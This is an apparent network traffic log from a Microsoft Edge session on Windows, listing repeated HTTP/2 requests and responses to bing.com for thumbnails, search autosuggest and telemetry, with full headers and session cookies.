sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1086
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a39bb55469d8c24141c9d515602
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-RRsEUyCsCKzzgjbI61yV4bdtGAlkJecbsqxAAua/+HY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:57 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d5b3
GET

https://www.bing.com/th?id=OSK.04d92d50cf01519e83ffe1cce06d7d9a&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.04d92d50cf01519e83ffe1cce06d7d9a&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4099
date: Wed, 04 Dec 2024 10:08:58 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306938.7f1d624
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=darkw&cp=5&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=darkw&cp=5&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7996
date: Wed, 04 Dec 2024 10:08:58 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306938.7f1d625
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22AsResponseLength%22%3A%221302%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%2Cig%3A7AF6F2526EF34F389F5C0667016445CF%22%2C%22AnswerInfo%22%3A%22AS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A4%2C%20%5C%22GL%5C%22%3A4%2C%20%5C%22IG%5C%22%3A%5C%227AF6F2526EF34F389F5C0667016445CF%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306928902%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306928902%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22AsResponseLength%22%3A%221086%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%2Cig%3A0D03F80EB8DA493FBFD0E33D08DC7B58%22%2C%22AnswerInfo%22%3A%22OS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22AsResponseLength%22%3A%221302%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%2Cig%3A7AF6F2526EF34F389F5C0667016445CF%22%2C%22AnswerInfo%22%3A%22AS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A4%2C%20%5C%22GL%5C%22%3A4%2C%20%5C%22IG%5C%22%3A%5C%227AF6F2526EF34F389F5C0667016445CF%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306928902%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306928902%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22AsResponseLength%22%3A%221086%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%2Cig%3A0D03F80EB8DA493FBFD0E33D08DC7B58%22%2C%22AnswerInfo%22%3A%22OS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:58 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306938.7f1d623
GET

https://www.bing.com/th?id=OSK.d882b7c729ccce9d209733fe8e43f26a&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.d882b7c729ccce9d209733fe8e43f26a&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8216
date: Wed, 04 Dec 2024 10:08:58 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306938.7f1d636
GET

https://www.bing.com/th?id=OSK.jEcgrhmx-KYSCBdw0c82e5im5MG7FE8g2Oz62GYxQo8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.jEcgrhmx-KYSCBdw0c82e5im5MG7FE8g2Oz62GYxQo8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
